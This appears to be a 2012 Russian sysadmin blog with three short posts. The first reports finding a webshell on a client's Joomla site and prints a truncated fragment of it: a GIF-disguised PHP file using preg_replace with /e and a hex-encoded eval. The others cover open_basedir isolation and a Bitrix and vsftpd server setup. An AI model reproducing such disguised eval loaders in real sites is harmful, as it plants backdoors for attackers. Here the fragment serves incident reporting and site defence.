27
Июнь
2012
Сегодня вычислил на хостинге клиента интересный руткит
|
GIF89af <? $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\.....тут ещё много символов ....T72vwA='\x29\x29\x29\x3B","."); ?> |
Залили используя дыры в Joomla (господа — нужно следить за обновлениями!) в неиспользуемый темплейт — далее, с его помощью, происходило заражение файлов с целью перенаправления поискового и мобильного трафика.
А вычислилась сия гадость с помощью контроля за изменением в файлах и анализа логов…
Пока гуглил на предмет данного руткита наткнулся на отличную утилитку для поиска на сайте всяческой нечисти, вроде моей — AI Bolit — скрипт с открытым кодом и хорошей репутацией, так что юзайте на здоровье.
Кстати, перед тем как вычистить заразу — натравил на сайт этот дивный скриптик — помимо того, что он вычислил заразу — предоставил ещё много интересной информации для усиления защиты сайта, так что рекомендую.
На страничке со скриптом есть ссылки на его обсуждение на известных SEO форумах — там тоже много интересного о защите сайтов.
рубрики: NIX, security, Полезности |
20
Июнь
2012
В случае использования на сервере нескольких виртуальных хостов необходимо в php закрывать вышестоящие директории от проникновения.
Т.е. в случае заражения одного сайта — другие останутся не тронутыми.
При использовании бэкэндом апача в связке с nginx — проблем нет — прописываем
php_admin_value open_basedir «/абсолютный путь до папки с доменом»
и вуаля
К сожалению подобного решения для связки nginx + fastcgi я пока не нашел.
Пока предлагают на каждого юзера (юзер=домен) поднимать отдельно fastcgi от имени юзера и рулить уже на уровне прав файловой системы, но в подобном решении не нравится мне такое распределение памяти…
ищем далее…
рубрики: NIX, security, Администрирование |
15
Июнь
2012
1. Бэкапим сайт
2. Берём чистую виртуалку (я взял Cent OS 5.8 на selectel.ru)
3. ставим mc: yum install mc
4. ставим RPM-пакет BitrixEnv (подробнее) (после установки запустить setup и разрешить 80 порт в фаерволе!)
5. заливаем бэкап и восстанавливаем его
ВУАЛЯ
6. ставим vsftp: разрешаем 21 порт; yum install vsftpd; правим /etc/vsftpd/vsftpd.conf на предмет anonymous_enable=NO и в конец добавляем chroot_local_user=YES дабы не шастали где попало; service vsftpd start; chkconfig vsftpd on;
P.S. если настройка идёт на готовой виртуалке от битрикса — там включен iptables, соответственно PAVS работать не будет — решение:
В конфиге vsftpd добавляем
pasv_min_port=30000
pasv_max_port=30999
и этот же диапазон прокидываем в фаерволе
рубрики: Bitrix |